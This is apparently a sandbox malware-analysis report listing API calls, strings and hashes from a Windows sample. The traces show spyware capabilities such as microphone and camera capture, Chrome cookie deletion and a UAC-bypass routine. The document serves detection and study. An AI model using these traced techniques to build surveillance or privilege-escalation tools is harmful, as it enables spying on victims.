                                          • API ID: InputSend$Virtual
                                          • String ID:
                                          • API String ID: 1167301434-0
                                          • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                          • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                          • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                          • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __freea$__alloca_probe_16_free
                                          • String ID: a/p$am/pm$h{D
                                          • API String ID: 2936374016-2303565833
                                          • Opcode ID: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                          • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                          • Opcode Fuzzy Hash: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                          • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                          APIs
                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          • _free.LIBCMT ref: 00444E87
                                          • _free.LIBCMT ref: 00444E9E
                                          • _free.LIBCMT ref: 00444EBD
                                          • _free.LIBCMT ref: 00444ED8
                                          • _free.LIBCMT ref: 00444EEF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$AllocateHeap
                                          • String ID: KED
                                          • API String ID: 3033488037-2133951994
                                          • Opcode ID: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                          • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                          • Opcode Fuzzy Hash: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                          • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                          APIs
                                          • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                          • __fassign.LIBCMT ref: 0044B4F9
                                          • __fassign.LIBCMT ref: 0044B514
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B559
                                          • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B592
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                          • String ID:
                                          • API String ID: 1324828854-0
                                          • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                          • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                          • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                          • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 004018BE
                                          • ExitThread.KERNEL32 ref: 004018F6
                                          • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EF0,00000000), ref: 00401A04
                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                          • String ID: `kG$hMG$kG
                                          • API String ID: 1649129571-3851552405
                                          • Opcode ID: 7e438f7e0de7e1a48061060bf47163465fed72e99f71de3365297fa9ff44aa49
                                          • Instruction ID: dc699b77c08b599092ddf19de7d80486fcd8c0a7edd7622242773fc29a9484b7
                                          • Opcode Fuzzy Hash: 7e438f7e0de7e1a48061060bf47163465fed72e99f71de3365297fa9ff44aa49
                                          • Instruction Fuzzy Hash: 3441C2312042009BC324FB36DD96ABE73A6AB85354F00453FF54AA61F1DF38AD4AC61E
                                          APIs
                                            • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750F4), ref: 00413678
                                            • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                            • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                          • _wcslen.LIBCMT ref: 0041B7F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                          • String ID: .exe$HSG$http\shell\open\command$program files (x86)\$program files\
                                          • API String ID: 3286818993-930133217
                                          • Opcode ID: b86b44ed08d52466cfc9a3801a6d71745e254f0deb3e8f8ed9e40c284f2e6556
                                          • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                          • Opcode Fuzzy Hash: b86b44ed08d52466cfc9a3801a6d71745e254f0deb3e8f8ed9e40c284f2e6556
                                          • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                          • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                          • Opcode Fuzzy Hash: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                          • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                          APIs
                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401A7D
                                          • waveInOpen.WINMM(00472AC0,000000FF,00472AC8,Function_00001B8F,00000000,00000000,00000024), ref: 00401B13
                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401B67
                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401B76
                                          • waveInStart.WINMM ref: 00401B82
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                          • String ID: tMG
                                          • API String ID: 1356121797-30866661
                                          • Opcode ID: a32bf82f151408e5f3abe306aa4422ab47744250154bd8f7e0bff8bea5466356
                                          • Instruction ID: cbef553d477d36f78321a165484ecc4410fcecc505b8f9aca62d01b994c6c3e6
                                          • Opcode Fuzzy Hash: a32bf82f151408e5f3abe306aa4422ab47744250154bd8f7e0bff8bea5466356
                                          • Instruction Fuzzy Hash: 8E2148716042019FC7299F6AEE09A697BAAFB84711B04403EE10DD76F1DBF848C5CB2C
                                          APIs
                                            • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                          • _free.LIBCMT ref: 00450FC8
                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                          • _free.LIBCMT ref: 00450FD3
                                          • _free.LIBCMT ref: 00450FDE
                                          • _free.LIBCMT ref: 00451032
                                          • _free.LIBCMT ref: 0045103D
                                          • _free.LIBCMT ref: 00451048
                                          • _free.LIBCMT ref: 00451053
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                          • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                          • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                          • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                          • int.LIBCPMT ref: 004111BE
                                            • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                            • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                          • std::_Facet_Register.LIBCPMT ref: 004111FE
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                          • String ID: 8mG
                                          • API String ID: 2536120697-3990007011
                                          • Opcode ID: 14799048d37b477e6c40f7e8d4f0e89b1ed2b05bcd10956721a24fc1261bb2b4
                                          • Instruction ID: 3a14b803bc510f5ed1108d30ac07207671fc4f07faef22c9ffd8c11cb1ae2def
                                          • Opcode Fuzzy Hash: 14799048d37b477e6c40f7e8d4f0e89b1ed2b05bcd10956721a24fc1261bb2b4
                                          • Instruction Fuzzy Hash: D3112332900124A7CB14EBAAD8018DEBBA99F44364F11456FFE04B72E1DB789E41CBD8
                                          APIs
                                          • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                          • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                          • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                          • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                          • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                          APIs
                                          • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe), ref: 0040760B
                                            • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                            • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                          • CoUninitialize.OLE32 ref: 00407664
                                          Strings
                                          • C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, xrefs: 004075EB, 004075EE, 00407640
                                          • [+] before ShellExec, xrefs: 0040762C
                                          • [+] ShellExec success, xrefs: 00407649
                                          • [+] ucmCMLuaUtilShellExecMethod, xrefs: 004075F0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InitializeObjectUninitialize_wcslen
                                          • String ID: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                          • API String ID: 3851391207-1143468238
                                          • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                          • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                          • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                          • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                          APIs
                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                          • GetLastError.KERNEL32 ref: 0040BB22
                                          Strings
                                          • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                          • [Chrome Cookies not found], xrefs: 0040BB3C
                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                          • UserProfile, xrefs: 0040BAE8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteErrorFileLast
                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                          • API String ID: 2018770650-304995407
                                          • Opcode ID: 7bdd53de2c7ce75327e0ce8a061dea47c63620c1b54bd56443db715df27270fd
                                          • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                          • Opcode Fuzzy Hash: 7bdd53de2c7ce75327e0ce8a061dea47c63620c1b54bd56443db715df27270fd
                                          • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                          APIs
                                          • _free.LIBCMT ref: 00444106
                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                          • _free.LIBCMT ref: 00444118
                                          • _free.LIBCMT ref: 0044412B
                                          • _free.LIBCMT ref: 0044413C
                                          • _free.LIBCMT ref: 0044414D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID: 0ce
                                          • API String ID: 776569668-2820837681
                                          • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                          • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                          • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                          • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                          APIs
                                          • __allrem.LIBCMT ref: 0043ACE9
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                          • __allrem.LIBCMT ref: 0043AD1C
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                          • __allrem.LIBCMT ref: 0043AD51
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 1992179935-0
                                          • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                          • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                          • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                          • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                          APIs
                                          • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                            • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: H_prologSleep
                                          • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$XNG
                                          • API String ID: 3469354165-985523790
                                          • Opcode ID: 07df79d1def3ea8d0f0114adccc6152b0d50d4d25af5b96514c935137a49def7
                                          • Instruction ID: 7593a199e81997f2aad1dc538160579efde4e563a54277089fa649d8e7e3dbe8
